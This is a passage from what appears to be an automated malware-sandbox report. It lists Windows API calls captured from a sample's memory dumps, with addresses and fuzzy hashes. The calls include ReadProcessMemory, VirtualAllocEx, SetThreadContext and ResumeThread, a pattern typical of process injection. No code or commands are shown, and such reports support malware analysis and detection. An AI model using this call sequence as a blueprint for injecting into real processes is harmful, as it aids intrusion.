                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 068D3128
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 8078b9162039430d425559eb3e1393e8c177feaccb3e9b2f6bd4f5fa81de085d
                                                  • Instruction ID: f2e22b2c1b08d70f46fb5f5a7ac8f8e6bff6e936ee75865ad686ce15d76409a2
                                                  • Opcode Fuzzy Hash: 8078b9162039430d425559eb3e1393e8c177feaccb3e9b2f6bd4f5fa81de085d
                                                  • Instruction Fuzzy Hash: 4F2124719002499FCF10CFAAC880AEEBBF5FF48314F54842AE958A7240DB349944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 068D3128
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: c3a51c391fbea4b88ad93fc18ab587dd405746b27e34133938f7b0e2e64eb32e
                                                  • Instruction ID: 63b14405f22343e823296c5e1d59696bf6a009d1eae02fb2d3236b1bf2e50fd0
                                                  • Opcode Fuzzy Hash: c3a51c391fbea4b88ad93fc18ab587dd405746b27e34133938f7b0e2e64eb32e
                                                  • Instruction Fuzzy Hash: 1D21E4719003499FCF10DFAAC884AEEBBB5FF48314F54842AE919A7640DB789944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 068D1E96
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: ContextThread
                                                  • String ID:
                                                  • API String ID: 1591575202-0
                                                  • Opcode ID: a3167f2d4e874e95613afbffc22d3cc57ae210125a7dde9aa50038d56ddee498
                                                  • Instruction ID: ca737c5c03bfac952e731bba2e573631df8d62eb821dc26b4a6cadc6cd2c81d2
                                                  • Opcode Fuzzy Hash: a3167f2d4e874e95613afbffc22d3cc57ae210125a7dde9aa50038d56ddee498
                                                  • Instruction Fuzzy Hash: A1213471D002088FDB50DFAAC4847EEBBF4AF88264F14842AD559A7640CB78A948CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 068D4ADE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: KernelObjectSecurity
                                                  • String ID:
                                                  • API String ID: 3015937269-0
                                                  • Opcode ID: 54a38c700a62f3bbaf20ea3887722a8206ba2872982a100823f8c6653bd8fc9d
                                                  • Instruction ID: a0fe0ffec27953d1e2fccbac7d7c4f6821d268fcd196921b819ccfd74aefccbc
                                                  • Opcode Fuzzy Hash: 54a38c700a62f3bbaf20ea3887722a8206ba2872982a100823f8c6653bd8fc9d
                                                  • Instruction Fuzzy Hash: B92115B19002499FCB10CF9AC485BEEBBF4EB88364F148429E519B7740DB78A944CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 068D2B66
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: fb54a6a5eda0c1dfb373c39ccf90f9c89048c487487504a0936b2d60108423b2
                                                  • Instruction ID: bba1cb1ef47a1699f9eef7760402d1d44298bf1cf6e53744e25bf9ad89a9da73
                                                  • Opcode Fuzzy Hash: fb54a6a5eda0c1dfb373c39ccf90f9c89048c487487504a0936b2d60108423b2
                                                  • Instruction Fuzzy Hash: E5111475900248DFCB10DFAAC844BEEBBF5EF88324F148819EA55A7650CB75A944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 068D2B66
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 951eab8d549e06988ef3df85c9e99589088420bd7787dd646b4c29af101f9da4
                                                  • Instruction ID: 81eb30e50fe88906146ac853a60e2880b738bddf1799f98e8630785789da9ae6
                                                  • Opcode Fuzzy Hash: 951eab8d549e06988ef3df85c9e99589088420bd7787dd646b4c29af101f9da4
                                                  • Instruction Fuzzy Hash: F511F3719002499BCF10DFAAC844BEFBBF5AF88324F148819E615A7650CB75A954CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 45f53927f2f0710cab98c0f822ba39f8b96a98639fb23a89d91c7b4238c39893
                                                  • Instruction ID: 86d2c11978265c56c617c1ea64c3eb333145263d232e85335232a83a0eb60628
                                                  • Opcode Fuzzy Hash: 45f53927f2f0710cab98c0f822ba39f8b96a98639fb23a89d91c7b4238c39893
                                                  • Instruction Fuzzy Hash: ED1146B1D043888BCB20DFAAC8447EEFBF5AF89328F148419D559B7600CB75A944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 8cdaf12840968597fb554461cfc5d386126e04d10a24810d36c54368dd79fc1d
                                                  • Instruction ID: a55ea6a1f0a5b8aef2373846758dca26f27ad4333e474f9aeb47bb06dbe92f36
                                                  • Opcode Fuzzy Hash: 8cdaf12840968597fb554461cfc5d386126e04d10a24810d36c54368dd79fc1d
                                                  • Instruction Fuzzy Hash: 251125B1D003488BCB10DFAAC4447EEFBF5AB88228F148419D519B7640CB74A944CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Executed Functions

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 00F869A0
                                                  • GetCurrentThread.KERNEL32 ref: 00F869DD
                                                  • GetCurrentProcess.KERNEL32 ref: 00F86A1A
                                                  • GetCurrentThreadId.KERNEL32 ref: 00F86A73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.603402694.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID: -h
                                                  • API String ID: 2063062207-250283842
                                                  • Opcode ID: d387066da0db7163a8628f247ff7e487ce13dc906b8204c91250de17c5ded9b7
                                                  • Instruction ID: 90c86653d30733f58ac95fa868e9def8067e2e6c9a5f7c812fc1043d39fa4a16
                                                  • Opcode Fuzzy Hash: d387066da0db7163a8628f247ff7e487ce13dc906b8204c91250de17c5ded9b7
                                                  • Instruction Fuzzy Hash: 5E5166B09053858FDB50DFA9C6487DEBBF0EF49314F20849AE549A7261CB749885CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 00F869A0
                                                  • GetCurrentThread.KERNEL32 ref: 00F869DD
                                                  • GetCurrentProcess.KERNEL32 ref: 00F86A1A
                                                  • GetCurrentThreadId.KERNEL32 ref: 00F86A73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.603402694.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID: -h
                                                  • API String ID: 2063062207-250283842
                                                  • Opcode ID: 2d97c16d3e8601de4a0807408cf56b928984eae13e99fb020b3abd2a29cf8484
                                                  • Instruction ID: d91460b76593a1d1b01654f49313a61814054235384bf4a1e6c2b39e300f485b
                                                  • Opcode Fuzzy Hash: 2d97c16d3e8601de4a0807408cf56b928984eae13e99fb020b3abd2a29cf8484
                                                  • Instruction Fuzzy Hash: B55134B0A006498FDB54DFA9C648BDEBBF1EB88314F208499E509B7350DB789984CF65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00F851A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.603402694.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID: -h$-h
                                                  • API String ID: 716092398-2479992367
                                                  • Opcode ID: 6a9d23cd0068d2f88e4e96dc27cf8b84614fb31c2cb55db1b98efe0c6dc01bb0
                                                  • Instruction ID: 571bd8e4a51c1552f81a380bdd2879b1fb7c72682a4572429163ff5fdf3d1639
                                                  • Opcode Fuzzy Hash: 6a9d23cd0068d2f88e4e96dc27cf8b84614fb31c2cb55db1b98efe0c6dc01bb0
                                                  • Instruction Fuzzy Hash: E951CEB1D106499FDF14CFA9C884ADEFBB1BF48314F64812AE819AB210D775A985CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00F851A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.603402694.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID: -h$-h
                                                  • API String ID: 716092398-2479992367
                                                  • Opcode ID: b8d5b34ad55275fcd4ff7aada121bb0a05aea2b57f0b9eeebe0090bf9cfedc47
                                                  • Instruction ID: 6144b246e01c7c25de3d630896b14c0c3bcc5d795b5bbb339322ab8880a1a1dd
                                                  • Opcode Fuzzy Hash: b8d5b34ad55275fcd4ff7aada121bb0a05aea2b57f0b9eeebe0090bf9cfedc47
                                                  • Instruction Fuzzy Hash: 4D41CDB1D007499FDF14DF99C884ADEFBB5BF48714F64812AE819AB210D774A885CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 00F87F09
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.603402694.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID: -h
                                                  • API String ID: 2714655100-250283842
                                                  • Opcode ID: cebb1de48e45b5b2bf664a005a337151f8ef9fb4fdf889eb5d6c7964e0427f62
                                                  • Instruction ID: c6a0f80cf644d10dfec0a8e95461363995ebc0d39c7b54185f0d4fe53098ae2e
                                                  • Opcode Fuzzy Hash: cebb1de48e45b5b2bf664a005a337151f8ef9fb4fdf889eb5d6c7964e0427f62
                                                  • Instruction Fuzzy Hash: 23413AB5A043458FCB14DF59C488BAABBF5FF88314F248899E519AB321D774E841DFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F86BEF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.603402694.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID: -h
                                                  • API String ID: 3793708945-250283842
                                                  • Opcode ID: 29345483345f4be2114d8f67116b831e8901ec62a17ccd32cf64aa17909011e0
                                                  • Instruction ID: b939d4b02ea6a919514524e47e76f4f2dc70e3f2eabf41ca16def9aa3ae1ad35
                                                  • Opcode Fuzzy Hash: 29345483345f4be2114d8f67116b831e8901ec62a17ccd32cf64aa17909011e0
                                                  • Instruction Fuzzy Hash: 392100B59002489FDB10CFA9D584AEEBFF4EB48324F14841AE854A7310D374A954DF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F86BEF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.603402694.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID: -h
                                                  • API String ID: 3793708945-250283842
                                                  • Opcode ID: 986e82ff09f39611731e1b9197f4a10e65432c52dabc141dd80e5a2f02802e0a
                                                  • Instruction ID: a393de2e523eea5cc45c35234241e87fbe36983fba2ad400911cddd5baaf4783
                                                  • Opcode Fuzzy Hash: 986e82ff09f39611731e1b9197f4a10e65432c52dabc141dd80e5a2f02802e0a
                                                  • Instruction Fuzzy Hash: C521E2B5900248AFDB10CFA9D984ADEFBF8FB48324F14841AE914B7310D774A944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 00F8BE92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.603402694.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID: -h
                                                  • API String ID: 2118026453-250283842
                                                  • Opcode ID: 27266926464f5b14e7b6c88461f7490b950389c06fc32d1b1bcc583f64669339
                                                  • Instruction ID: c090293718c35008b59c2be761e4e819633f01b6ff84cb51bb37b74ca0a556fa
                                                  • Opcode Fuzzy Hash: 27266926464f5b14e7b6c88461f7490b950389c06fc32d1b1bcc583f64669339
                                                  • Instruction Fuzzy Hash: 2C218CB19013898EDB60EFAAC5493DEBFF5FB08324F24846AD545A3605DB385909CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 00F8BE92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.603402694.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID: -h
                                                  • API String ID: 2118026453-250283842
                                                  • Opcode ID: 43aa8078c435e014d29798cfef5d30b37b7ae687dedf236d67a97be018dce25f
                                                  • Instruction ID: 8fc045701fde3ceb3f3fda1587fbc288f05ae0d7d3356356f3fc5a64f4fd8158
                                                  • Opcode Fuzzy Hash: 43aa8078c435e014d29798cfef5d30b37b7ae687dedf236d67a97be018dce25f
                                                  • Instruction Fuzzy Hash: B9119DB19013498FCB50EF9AC5487DEBBF4FB04324F20842AD505A3704DB78A905CF65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00E40E24
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.602898103.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 13034d6f5034933d566b39e11242afc601a6a368c1c509e37647e6c6987abd33
                                                  • Instruction ID: 28ffc8587c34c2ee022aee83c85dfddeb518b99e24d62007a06ef80ce78c6fae
                                                  • Opcode Fuzzy Hash: 13034d6f5034933d566b39e11242afc601a6a368c1c509e37647e6c6987abd33
                                                  • Instruction Fuzzy Hash: B8A20274A04228CFCB64EF20D9586ADBBBAAF88305F1085E9D50AA3750DF349EC5CF55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00E40E24
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.602898103.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: a258049dc5279c537b4bff41db25e9ec7d47e6b543d028d82e59dec5319e27c2
                                                  • Instruction ID: 34fcc7e4ead3500b3d955d1f06ab5c5eb554ca191a52e1c11145950d76ed5e49
                                                  • Opcode Fuzzy Hash: a258049dc5279c537b4bff41db25e9ec7d47e6b543d028d82e59dec5319e27c2
                                                  • Instruction Fuzzy Hash: E262F374A04228CFCB64EB20D95869CBBBABF48305F5095EAD50AA7740CF349EC5CF65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00E40E24
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.602898103.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 97e68d1955285344eacda5febd09c7c879c2af807422fa614e807038e0da0feb
                                                  • Instruction ID: 864776f2bc29b5944f6be786a0a36f3c8216497c93621753d397399c74096cd0
                                                  • Opcode Fuzzy Hash: 97e68d1955285344eacda5febd09c7c879c2af807422fa614e807038e0da0feb
                                                  • Instruction Fuzzy Hash: B852E374A04228CFCB64EB20D95869CBBBABF48305F5095EAD50AA7740CF349EC5CF65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00E40E24
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.602898103.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: da18b883e478812b9c320be167221bb56b55e0b1e054b2792d020a90c866e8b1
                                                  • Instruction ID: 68f77532d93805b8f58eafe85e9dff4766892de9f6d06d16c2891ba6ae73e91b
                                                  • Opcode Fuzzy Hash: da18b883e478812b9c320be167221bb56b55e0b1e054b2792d020a90c866e8b1
                                                  • Instruction Fuzzy Hash: 4152E374A04228CFCB64EB20D95869CBBBABF48305F5095EAD50AA7740CF349EC5CF65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00E40E24
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.602898103.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: c01d3c913c02967daddeb9aa0c2d86727ffed60219e104b827464ac8ebb4020b
                                                  • Instruction ID: 1ff9e4cc1b302649cb29a9d0a1529eab52f7e506454fd6a6d28b3afd41c62f00
                                                  • Opcode Fuzzy Hash: c01d3c913c02967daddeb9aa0c2d86727ffed60219e104b827464ac8ebb4020b
                                                  • Instruction Fuzzy Hash: 4F52E374A04228CFCB64EB20D95869CBBBABF48305F5095EAD50AA7740CF349EC5CF65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00E40E24
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.602898103.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: f6baaa6313a8485b30b6c8705f28e71721007c7bd8c28b2e832d02cb05bf6967
                                                  • Instruction ID: 07d52a93c509be18a3710993bc69f90367a38eedc81c5c568d9206afc047f3c5
                                                  • Opcode Fuzzy Hash: f6baaa6313a8485b30b6c8705f28e71721007c7bd8c28b2e832d02cb05bf6967
                                                  • Instruction Fuzzy Hash: F152E474A04228CFCB64EB20D95869CB7BABF48305F5095EAD50AA7740CF349EC5CF65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00E40E24
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.602898103.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 7a0bc43a0a6ab9be759df5a2d0d2547488d7f2a9f9adbc990d55c43c7a1ca9da
                                                  • Instruction ID: b08d93960b9c763a93863c640aa530633d2a8ee5f1ec675da1440aa99ad4f7eb
                                                  • Opcode Fuzzy Hash: 7a0bc43a0a6ab9be759df5a2d0d2547488d7f2a9f9adbc990d55c43c7a1ca9da
                                                  • Instruction Fuzzy Hash: 9052E374A04228CFCB64EB20D9586ACB7BABF88305F5085E9D50AA7740CF349EC5CF65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00E40E24
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.602898103.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00E40E24
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.602898103.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00E40E24
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.602898103.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00E40E24
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.602898103.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00E40E24
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.602898103.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00E40E24
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.602898103.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00E40E24
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.602898103.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 00E40E24
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.602898103.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.602642152.0000000000DFD000.00000040.00000001.sdmp, Offset: 00DFD000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.602642152.0000000000DFD000.00000040.00000001.sdmp, Offset: 00DFD000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.603133551.0000000000F1D000.00000040.00000001.sdmp, Offset: 00F1D000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.603133551.0000000000F1D000.00000040.00000001.sdmp, Offset: 00F1D000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.602642152.0000000000DFD000.00000040.00000001.sdmp, Offset: 00DFD000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.602642152.0000000000DFD000.00000040.00000001.sdmp, Offset: 00DFD000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions